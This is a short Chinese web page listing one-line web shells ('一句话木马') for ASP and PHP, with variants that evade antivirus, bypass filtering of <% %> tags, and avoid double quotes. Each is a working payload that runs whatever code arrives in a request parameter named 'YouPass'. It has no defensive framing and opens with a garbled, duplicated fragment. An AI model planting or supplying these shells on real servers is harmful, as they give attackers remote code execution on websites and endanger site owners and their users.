2. 3. 免杀大部分网站的一句话4.< set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms."/>

一句话木马及几种可绕过过滤格式

一句话木马及几种可绕过过滤格式

ASP一句话

1.<%eval request("YouPass")%>

2. <%executerequest("YouPass")%>

3. <%execute(request("YouPass"))%>

免杀大部分网站的一句话

4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>

绕过部分网站过滤<%,%>的一句话

5.<script language=VBScript runat=server>execute request("YouPass")</script>

绕过部分网站过滤双引号的一句话

6.<%eval request(YouPass(35))%>

php一句话

7.<?php eval($_POST[YouPass]);?>

推荐阅读